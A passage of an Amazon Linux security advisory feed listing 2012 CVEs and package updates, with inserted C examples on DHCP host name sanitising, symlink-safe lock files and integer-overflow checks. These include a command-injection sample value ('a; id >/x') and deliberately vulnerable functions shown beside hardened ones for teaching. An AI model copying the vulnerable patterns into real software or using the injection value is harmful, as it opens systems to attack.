The NFSv4 implementation in the Linux kernel before 3.2.2 does not properly handle bitmap sizes in GETACL replies, which allows remote NFS servers to cause a denial of service (OOPS) by sending an excessive number of bitmap words.
747106:
CVE-2011-4131 kernel: nfs4_getfacl decoding kernel oops
* A malicious Network File System version 4 (NFSv4) server could return a crafted reply to a GETACL request, causing a denial of service on the client.
CVE-2011-1083:
The epoll implementation in the Linux kernel 2.6.37.2 and earlier does not properly traverse a tree of epoll file descriptors, which allows local users to cause a denial of service (CPU consumption) via a crafted application that makes epoll_create and epoll_ctl system calls.
* A flaw was found in the way the Linux kernel's Event Poll (epoll) subsystem handled large, nested epoll structures. A local, unprivileged user could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1083" title="" id="CVE-2011-1083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4131" title="" id="CVE-2011-4131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2372" title="" id="CVE-2012-2372" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0862.html" title="" id="RHSA-2012:0862" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.22" release="35.60.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.22-35.60.amzn1.noarch.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.22-35.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.22" release="35.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.22-35.60.amzn1.i686.rpm</filename></package><package 
name="kernel-tools-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.22-35.60.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.22" release="35.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.22-35.60.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-101</id><title>Amazon Linux - ALAS-2012-101: medium priority package update for openldap</title><issued date="2012-07-05 16:21:00" /><updated date="2014-09-14 16:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1164:
slapd in OpenLDAP before 2.4.30 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an LDAP search query with attrsOnly set to true, which causes empty attributes to be returned.
A denial of service flaw was found in the way the OpenLDAP server daemon (slapd) processed certain search queries requesting only attributes and no values. In certain configurations, a remote attacker could issue a specially-crafted LDAP search query that, when processed by slapd, would cause slapd to crash due to an assertion failure.
802514:
CVE-2012-1164 openldap (slapd): Assertion failure by processing search queries requesting only attributes for particular entry
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1164" title="" id="CVE-2012-1164" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0899.html" title="" id="RHSA-2012:0899" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openldap-servers-sql" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="26.15.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-26.15.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="26.15.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-26.15.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-26.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-102</id><title>Amazon Linux - ALAS-2012-102: medium priority package update for nss</title><issued date="2012-07-05 16:22:00" /><updated date="2014-09-14 16:42:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2012:0973.html" title="" id="RHSA-2012:0973" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nss-debuginfo" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.13.3" release="8.25.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss" version="3.13.3" release="8.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-3.13.3-8.25.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.13.3-8.25.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.13.3" release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.13.3-8.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-103</id><title>Amazon Linux - ALAS-2012-103: low priority package update for busybox</title><issued date="2012-07-05 16:23:00" /><updated date="2014-09-14 16:43:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2716:
The BusyBox DHCP client, udhcpc, did not sufficiently sanitize certain options provided in DHCP server replies, such as the client hostname. A malicious DHCP server could send such an option with a specially-crafted value to a DHCP client. If this option's value was saved on the client system, and then later insecurely evaluated by a process that assumes the option is trusted, it could lead to arbitrary code execution with the privileges of that process. Note: udhcpc is not used on Red Hat Enterprise Linux by default, and no DHCP client script is provided with the busybox packages.
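<![CDATA[
Added example for the udhcpc flaw above; this is not BusyBox code. It shows what "sufficiently sanitize" means in practice: the Host Name option (code 12, RFC 2132 TLV layout) is pulled out of a DHCP options blob, the server-supplied length byte is bounds-checked before it is trusted, and the value is accepted only if it is a syntactically valid RFC 1123 host name, so shell metacharacters never reach a file that a client script later evaluates. The option bytes and all function names are constructed for this example.

```c
/* Added example (not BusyBox/udhcpc code): pull the Host Name option out of
 * a DHCP options blob and accept it only if it is a syntactically valid
 * host name. Option codes and the TLV layout follow RFC 2132; the sample
 * option bytes below are constructed for this example. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define DHCP_OPT_PAD       0
#define DHCP_OPT_HOSTNAME  12
#define DHCP_OPT_END       255

/* RFC 1123 host name: dot-separated labels of [A-Za-z0-9-], 1..63 chars,
 * no leading or trailing hyphen, at most 253 chars overall. Everything a
 * shell or config parser could misinterpret (space ; $ ` " ' newline ...)
 * falls outside this alphabet and is rejected. */
bool dhcp_hostname_ok(const char *name, size_t len)
{
    size_t label = 0;
    if (len == 0 || len > 253) return false;
    for (size_t i = 0; i < len; i++) {
        char c = name[i];
        bool alnum = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                     (c >= '0' && c <= '9');
        if (c == '.') {
            if (label == 0 || name[i - 1] == '-') return false;
            label = 0;
            continue;
        }
        if (!alnum && c != '-') return false;
        if (c == '-' && label == 0) return false;
        if (++label > 63) return false;
    }
    return label > 0 && name[len - 1] != '-';
}

/* Walk the options field. Returns 1 and copies the host name (NUL-terminated)
 * into out when a valid option 12 is present, 0 when absent, -1 when the
 * blob is malformed (length byte runs past the end) or the name is invalid.
 * The length byte comes from the server, so it is bounds-checked before use. */
int dhcp_hostname_from_options(const unsigned char *opts, size_t n,
                               char *out, size_t outcap)
{
    size_t i = 0;
    while (i < n) {
        unsigned char code = opts[i++];
        if (code == DHCP_OPT_PAD) continue;
        if (code == DHCP_OPT_END) break;
        if (i >= n) return -1;                 /* code without a length byte */
        size_t len = opts[i++];
        if (len > n - i) return -1;            /* length runs past the blob */
        if (code == DHCP_OPT_HOSTNAME) {
            if (len >= outcap || !dhcp_hostname_ok((const char *)opts + i, len))
                return -1;
            memcpy(out, opts + i, len);
            out[len] = '\0';
            return 1;
        }
        i += len;
    }
    return 0;
}

/* Constructed sample replies: subnet mask + "host1"; an injection attempt;
 * a length byte that overruns the blob. */
static const unsigned char reply_good[]      = { 1, 4, 255, 255, 255, 0, 12, 5, 'h', 'o', 's', 't', '1', 255 };
static const unsigned char reply_injection[] = { 12, 9, 'a', ';', ' ', 'i', 'd', ' ', '>', '/', 'x', 255 };
static const unsigned char reply_truncated[] = { 12, 200, 'x', 'y' };

int dhcp_demo(const unsigned char *reply, size_t n)
{
    char name[64];
    return dhcp_hostname_from_options(reply, n, name, sizeof name);
}
```

The allow-list is deliberately narrower than what DHCP permits on the wire: a client that writes the value into /etc/hostname or exports it to a hook script has no legitimate use for anything outside the host name alphabet, so rejecting the option outright is safer than trying to escape it.
]]>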
CVE-2006-1168:
The decompress function in compress42.c in (1) ncompress 4.2.4 and (2) liblzw allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code, via crafted data that leads to a buffer underflow.
A buffer underflow flaw was found in the way the uncompress utility of BusyBox expanded certain archive files compressed using Lempel-Ziv compression. If a user were tricked into expanding a specially-crafted archive file with uncompress, it could cause BusyBox to crash or, potentially, execute arbitrary code with the privileges of the user running BusyBox.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1168" title="" id="CVE-2006-1168" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2716" title="" id="CVE-2011-2716" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0810.html" title="" id="RHSA-2012:0810" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="busybox" version="1.19.3" release="2.11.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.19.3-2.11.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.11.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.19.3-2.11.amzn1.i686.rpm</filename></package><package name="busybox" version="1.19.3" release="2.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.19.3-2.11.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.19.3-2.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-104</id><title>Amazon Linux - ALAS-2012-104: low priority package update for xorg-x11-server</title><issued date="2012-07-05 16:24:00" /><updated date="2014-09-14 16:44:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4029:
The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to change the permissions of arbitrary files to 444, read those files, and possibly cause a denial of service (removed execution permission) via a symlink attack on a temporary lock file.
A race condition was found in the way the X.Org server managed temporary lock files. A local attacker could use this flaw to perform a symbolic link attack, allowing them to make an arbitrary file world readable, leading to the disclosure of sensitive information.
745024:
CVE-2011-4029 xorg-x11-server: lock file chmod change race condition
CVE-2011-4028:
A flaw was found in the way the X.Org server handled lock files. A local user with access to the system console could use this flaw to determine the existence of a file in a directory not accessible to the user, via a symbolic link attack.
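<![CDATA[
Added example for the two lock-file flaws above; this is not X.Org server code. It places the vulnerable pattern (create the lock, then chmod() it by path, which follows a symlink an attacker dropped in the race window) next to a hardened version (O_CREAT|O_EXCL|O_NOFOLLOW so an existing symlink is refused, and fchmod() on the descriptor so no path is re-resolved), and exercises both in a throw-away directory. Directory and file names are invented for the example.

```c
/* Added example (not X.Org server code): the create-then-chmod-by-path
 * lock pattern behind CVE-2011-4029 next to a hardened version, exercised
 * in a throw-away directory. Paths and names are invented for the example. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable shape: the mode change is applied to the *path*. If the path
 * is (or, in the race window, becomes) a symlink, chmod() follows it and
 * makes the attacker's chosen file world-readable. */
int lock_create_vulnerable(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT, 0644);
    if (fd < 0) return -1;
    close(fd);
    return chmod(path, 0444);
}

/* Hardened: O_EXCL refuses to reuse anything that already exists, symlinks
 * included; O_NOFOLLOW covers the dangling-link case; the mode is set with
 * fchmod() on the descriptor we actually created, so no path is
 * re-resolved after the create. */
int lock_create_hardened(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    if (fchmod(fd, 0444) < 0) { close(fd); unlink(path); return -1; }
    close(fd);
    return 0;
}

static mode_t perm_bits(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (st.st_mode & 0777) : (mode_t)-1;
}

/* Runs the scenario: a victim file, a symlink pointing at it, and both
 * lock creators. Returns 0 when the vulnerable version changed the victim's
 * mode and the hardened version refused; a step number otherwise. */
int lock_demo(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";
    char victim[64], link[64], fresh[64];
    int rc = 0, fd;

    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/lock", dir);
    snprintf(fresh, sizeof fresh, "%s/lock2", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || close(fd) < 0) rc = 2;
    else if (symlink(victim, link) < 0) rc = 3;
    /* attacker's symlink is followed: the private victim becomes 0444 */
    else if (lock_create_vulnerable(link) != 0 || perm_bits(victim) != 0444) rc = 4;
    /* hardened version refuses the symlink (EEXIST) ... */
    else if (lock_create_hardened(link) == 0 || (errno != EEXIST && errno != ELOOP)) rc = 5;
    /* ... but creates a fresh lock with the intended mode */
    else if (lock_create_hardened(fresh) != 0 || perm_bits(fresh) != 0444) rc = 6;

    unlink(fresh); unlink(link); unlink(victim); rmdir(dir);
    return rc;
}
```

The same principle closes CVE-2011-4028: a lock-file probe that reports EEXIST for a symlink it would never follow leaks nothing about where the link points, because the existence check never dereferences the attacker-controlled path.
]]>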
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4028" title="" id="CVE-2011-4028" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4029" title="" id="CVE-2011-4029" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0939.html" title="" id="RHSA-2012:0939" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="xorg-x11-server-common" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-source" version="1.10.6" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.10.6-1.12.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.10.6-1.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-105</id><title>Amazon Linux - ALAS-2012-105: medium priority package update for rsyslog</title><issued date="2012-07-06 16:04:00" /><updated date="2014-09-14 16:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4623:
Integer overflow in the rsCStrExtendBuf function in runtime/stringbuf.c in the imfile module in rsyslog 4.x before 4.6.6, 5.x before 5.7.4, and 6.x before 6.1.4 allows local users to cause a denial of service (daemon hang) via a large file, which triggers a heap-based buffer overflow.
A numeric truncation error, leading to a heap-based buffer overflow, was found in the way the rsyslog imfile module processed text files containing long lines. An attacker could use this flaw to crash the rsyslogd daemon or, possibly, execute arbitrary code with the privileges of rsyslogd, if they are able to cause a long line to be written to a log file that rsyslogd monitors with imfile. The imfile module is not enabled by default.
769822:
CVE-2011-4623 rsyslog: DoS due to integer signedness error while extending rsyslog counted string buffer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4623" title="" id="CVE-2011-4623" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0796.html" title="" id="RHSA-2012:0796" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rsyslog-gssapi" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gssapi-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-snmp-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-mysql-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-pgsql-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gnutls-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-debuginfo-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-pgsql-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-snmp-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="2.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rsyslog-gnutls-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-debuginfo-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-mysql-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gssapi-5.8.10-2.17.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-106</id><title>Amazon Linux - ALAS-2012-106: important priority package update for libtiff</title><issued date="2012-07-06 16:18:00" /><updated date="2014-09-14 16:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2113:
Multiple integer overflows in tiff2pdf in libtiff before 4.0.2 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the tiff2pdf tool. An attacker could use these flaws to create a specially-crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
810551:
CVE-2012-2113 libtiff: integer overflow in tiff2pdf leading to heap-buffer overflow when reading a tiled tiff file
CVE-2012-2088:
libtiff did not properly convert between signed and unsigned integer values, leading to a buffer overflow. An attacker could use this flaw to create a specially-crafted TIFF file that, when opened, would cause an application linked against libtiff to crash or, possibly, execute arbitrary code.
Integer signedness error in the TIFFReadDirectory function in tif_dirread.c in libtiff 3.9.4 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a negative tile depth in a tiff image, which triggers an improper conversion between signed and unsigned types, leading to a heap-based buffer overflow.
832864:
CVE-2012-2088 libtiff: Type conversion flaw leading to heap-buffer overflow
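<![CDATA[
Added example for the libtiff entries above and for the rsyslog imfile advisory earlier on this page (ALAS-2012-105); this is neither project's code. It shows the two integer pitfalls those advisories name in one place: a signed tile depth reinterpreted as unsigned and multiplied into a byte count that wraps (CVE-2012-2088, CVE-2012-2113), and a counted string buffer that must be extended with overflow-checked size_t arithmetic rather than int arithmetic (CVE-2011-4623). The checked forms rely on the GCC/Clang __builtin_*_overflow helpers; the policy cap and all names are assumptions for the example.

```c
/* Added example (not rsyslog's or libtiff's code) of the two integer
 * pitfalls named in the rsyslog and libtiff advisories: a signed dimension
 * silently reinterpreted as unsigned, and a size computed with wrapping
 * arithmetic before it reaches the allocator. Names are invented. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable shape: a tile depth read from the file as int32 is multiplied
 * into an unsigned byte count. depth == -1 becomes 0xFFFFFFFF and the product
 * wraps, so the buffer allocated from it is far smaller than the data that
 * is later written into it. */
uint32_t tile_bytes_unchecked(uint32_t width, uint32_t height, int32_t depth, uint32_t bpp)
{
    return width * height * (uint32_t)depth * bpp;
}

/* Hardened: reject non-positive or zero factors and check every
 * multiplication. Returns 0 (never a valid size here) on failure. */
size_t tile_bytes_checked(uint32_t width, uint32_t height, int32_t depth, uint32_t bpp)
{
    size_t n;
    if (depth <= 0 || width == 0 || height == 0 || bpp == 0) return 0;
    if (__builtin_mul_overflow((size_t)width, (size_t)height, &n)) return 0;
    if (__builtin_mul_overflow(n, (size_t)depth, &n)) return 0;
    if (__builtin_mul_overflow(n, (size_t)bpp, &n)) return 0;
    return n;
}

/* Growable counted string. Lengths are size_t throughout (the rsyslog bug
 * was an int/size_t mismatch while extending such a buffer), the new length
 * is computed with an overflow check, and an explicit policy cap bounds
 * what a single over-long log line can make us allocate. */
#define CSTR_MAX ((size_t)64 * 1024 * 1024)   /* assumed policy limit */

typedef struct { unsigned char *data; size_t len, cap; } cstr;

int cstr_append(cstr *s, const void *src, size_t n)
{
    size_t need, newcap;
    if (__builtin_add_overflow(s->len, n, &need) || need > CSTR_MAX) return -1;
    if (need > s->cap) {
        newcap = s->cap ? s->cap : 64;
        while (newcap < need)
            if (__builtin_mul_overflow(newcap, (size_t)2, &newcap)) return -1;
        if (newcap > CSTR_MAX) newcap = CSTR_MAX;
        unsigned char *p = realloc(s->data, newcap);
        if (!p) return -1;
        s->data = p;
        s->cap = newcap;
    }
    memcpy(s->data + s->len, src, n);
    s->len = need;
    return 0;
}

/* Feed a 100,000-byte "line" in 100-byte pieces; returns the final length. */
size_t cstr_demo_long_line(void)
{
    cstr s = { NULL, 0, 0 };
    char piece[100];
    size_t out;
    memset(piece, 'x', sizeof piece);
    for (int i = 0; i < 1000; i++)
        if (cstr_append(&s, piece, sizeof piece) != 0) break;
    out = s.len;
    free(s.data);
    return out;
}

/* A length that would have wrapped an int-based computation is refused. */
int cstr_demo_rejects_huge(void)
{
    cstr s = { NULL, 0, 0 };
    int rc = cstr_append(&s, "", SIZE_MAX);
    free(s.data);
    return rc == -1;
}
```

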